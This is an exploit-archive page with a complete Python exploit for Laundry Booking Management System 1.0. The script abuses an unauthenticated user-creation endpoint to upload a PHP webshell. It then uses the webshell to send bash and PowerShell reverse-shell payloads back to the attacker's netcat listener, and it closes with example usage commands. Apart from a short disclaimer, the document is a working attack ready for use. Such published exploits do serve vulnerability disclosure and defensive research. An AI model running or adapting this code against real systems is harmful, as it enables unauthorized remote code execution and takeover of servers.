Laundry booking management system 1.0 remote code execution (rce) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-11-30 | Type : webapps | Platform : php
This exploit / vulnerability Laundry booking management system 1.0 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
# Date: 29/11/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10

# Vulnerability: Its possible create an user without being authenticated,
# in this request you can upload a simple webshell which will used to get a
# reverse shell

import re, sys, argparse, requests, time, os
import subprocess, pyfiglet

ascii_banner = pyfiglet.figlet_format("Laundry")
print(ascii_banner)
print(" Booking Management System\n")
print("----[Broken Access Control to RCE]----\n")


class Exploit:

def __init__(self,target, shell_name,localhost,localport,os):

self.target=target
self.shell_name=shell_name
self.localhost=localhost
self.localport=localport
self.LHL= '/'.join([localhost,localport])
self.HPW= "'"+localhost+"'"+','+localport
self.os=os
self.session = requests.Session()
#self.http_proxy = "http://127.0.0.1:8080"
#self.https_proxy = "https://127.0.0.1:8080"
#self.proxies = {"http" : self.http_proxy,
# "https" : self.https_proxy}

self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'}

def create_user(self):

url = self.target+"/pages/save_user.php"
data = {
"fname":"bypass",
"email":"bypass@bypass.com",
"password":"password",
"group_id": "2",

}

#Creates user "bypass" and upload a simple webshell without authentication
request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"<?=`$_GET[cmd]`?>")})
time.sleep(3)
if (request.status_code == 200):
print('[*] The user and webshell were created\n')
else:
print('Something was wront...!')

def execute_shell(self):
if self.os == "linux":
time.sleep(3)
print("[*] Starting reverse shell\n")
subprocess.Popen(["nc","-nvlp", self.localport])
time.sleep(3)

#Use a payload in bash to get a reverse shell
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload

try:
request_rce = requests.get(execute_command)
print(request_rce.text)

except requests.exceptions.ReadTimeout:
pass

elif self.os == "windows":
time.sleep(3)
print("[*] Starting reverse shell\n")
subprocess.Popen(["nc","-nvlp", self.localport])
time.sleep(3)

#Use a payload in powershell to get a reverse shell
payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload


try:
request_rce = requests.get(execute_command)
print(request_rce.text)

except requests.exceptions.ReadTimeout:
pass

else:
print('Windows or linux')


def get_args():
parser = argparse.ArgumentParser(description='Laundry Booking Management System')
parser.add_argument('-t', '--target', dest="target", required=True,
action='store', help='Target url')
parser.add_argument('-s', '--shell_name', dest="shell_name",
required=True, action='store', help='shell_name')
parser.add_argument('-l', '--localhost', dest="localhost",
required=True, action='store', help='local host')
parser.add_argument('-p', '--localport', dest="localport",
required=True, action='store', help='local port')
parser.add_argument('-os', '--os', choices=['linux', 'windows'],
dest="os", required=True, action='store', help='linux,windows')
args = parser.parse_args()
return args

args = get_args()
target = args.target
shell_name = args.shell_name
localhost = args.localhost
localport = args.localport


xp = Exploit(target, shell_name,localhost,localport,args.os)
xp.create_user()
xp.execute_shell()

#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows
#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux